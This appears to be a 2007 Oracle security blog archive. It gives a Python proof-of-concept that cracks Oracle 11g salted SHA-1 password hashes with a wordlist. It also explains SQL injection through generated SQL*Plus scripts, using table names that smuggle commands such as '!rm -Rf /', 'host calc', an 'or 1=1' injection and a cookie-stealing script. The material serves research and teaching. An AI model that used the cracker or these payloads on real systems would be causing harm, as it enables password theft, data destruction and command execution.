Archive for September, 2007

Oracle 0xDEADF00D

Samstag, September 22nd, 2007

Thorsten Schröder and Felix “FX” Lindner from Recurity Labs GmbH just posted an article about their experience during the analysis of the Oracle 11g password algorithm.

Oracle Password Algorithm 11g – PoC Code

Freitag, September 21st, 2007

Oracle 11g is using a new password algorithm based on SHA-1 and finally supports case-sensitive passwords. Our partner, Recurity Labs GmbH (formerly known as S*bre Labs GmbH), did an analysis of the algorithm for us. A really great blog entry about their process of research could be found here.

Thorsten Schröder from Recurity Labs GmbH wrote a small python script as a PoC. The updated version of checkpwd 2.0 with support for Oracle 11g will be released on monday. On monday we will also release some performance numbers with a benchmark 10g vs 11g.

—

#!python

# “PoC” Oracle 11g Database password-hash cracker
# This program uses the password hash value “spare4″ from the internal
# oracle user-database and a list of passwords via stdin to calculate a new
# hash value of the plaintext password. The new generated hash value is subsequently
# compared against the hash-value from sys.user, the internal oracle user-database.

# Author: Thorsten Schroeder <ths „theAthing“ recurity-labs.com>
# Berlin, 19. Sep. 2007

# TODO:
# cut passwords at length 30

import hashlib
import binascii
import sys

def main():

if( len(sys.argv[1]) != 60 ):
usage()
sys.exit(1)

try:
oraHash = sys.argv[1]
oraSalt = oraHash[40:60]
oraSha1 = oraHash[:40]
oraSha1 = oraSha1.upper()

print “[+] using salt: 0x%s” % oraSalt
print “[+] using hash: 0x%s” % oraSha1

for passwd in sys.stdin:
passwd = passwd.rstrip()
#print “[*] trying password “%s”” % passwd

s = hashlib.sha1()
s.update(passwd)
s.update(binascii.a2b_hex(oraSalt))
if( s.hexdigest().upper() == oraSha1 ):
print “[*] MATCH! -> %s” % passwd
sys.exit(0)

except Exception, e:
print “[!] Error: “, e
usage()
raise

sys.exit(0)

def usage():
print “[+] usage: ./ora11gPWCrack.py <hex-value> < wordlist.txt”
return

if __name__ == ‘__main__’:
main()

Create Table „!rm -Rf /“ („‚ or 1=1–“ a varchar2(1));

Mittwoch, September 12th, 2007

2 days ago I uploaded my HackInTheBox 2007 presentation „Hacking Hardened and Patched Oracle Databases“ from Malaysia. In this presentation I showed different ways how to hack patched and hardened databases, remove traces from audit tables, …

I explained for example that many SQL*Plus scripts (created on the fly via SPOOL or dbms_output) are vulnerable against SQL Injection. Such a script looks like:
———————-

set heading off
spool /export/home/oracle/drop.sql

select ‚drop table ‚||table_name||‘ cascade constraints ;‘ from dba_tables where owner=’RDS‘;

spool off;

@/export/home/oracle/drop.sql

———————–

The problem with this script is that table_name is concatenated without input validation or the right usage of quotation characters. By creating a table called „sys.aud$“ in the schema „RDS“ it is possible to delete tables from another user (==> drop table sys.aud$) because SQL*Plus scripts are often generated and executed by a DBA user.

Instead of dropping tables it is even possible to run operating system commands (using the strings host,! or $, see vulnerable sample script). SQL*Plus is interpreting the characters ! (Unix) and $ (Windows) as operating system call (= host command).

The following SQL statements are correct but sometimes there are side effects…:

———————–

create table “ ‚ or 1=1 –“ (a varchar2(1));

create table „<script>alert(document.cookie)“ („</script>“ varchar2(1));

create table „!rm -Rf /“ (a varchar2(1));

create table „host calc“ (a varchar2(1));

———————–

Impressions from HackInTheBox 2007 Malaysia

Sonntag, September 9th, 2007

Just back from the biggest security conference „Hack In The Box“ (HITB2007) in Asia. The conference took place in Kuala Lumpur in Malaysia. It was a really interesting conference and I met many interesting people and old friends like Stefano, FX, Sharan, David, Selwin, …

I gave a 2 day Oracle Anti-Hacker Training for people from all over the world and also a talk about „Hacking hardened and patched Oracle databases“. I will talk about my presentation (e.g. why the content of a create table „!rm -Rf /“ is sometimes executed on OS level) in the next blog entry.
Here some lessons I learned at the conference:

1.) Microsoft saved my „Hacking Oracle“ presentation because my MacBook Pro with Keynote 2008 was not working together with the projector (macs from other speakers were working). At the stage I had to convert the keynote presentation into powerpoint and to use my old laptop with windows to show my Oracle presentation.

2.) Asia Hackers are no thieves.
During the chaotic presentation (see 1.) I changed my laptops on the stage. Few hours later on the way to the airport I detected the I forgot the 3rd laptop. A short telephone call to the organizer Dhillon and a few minutes later I’ve got the message that the laptop (with full harddisk encryption) was still there.

It was a great conference…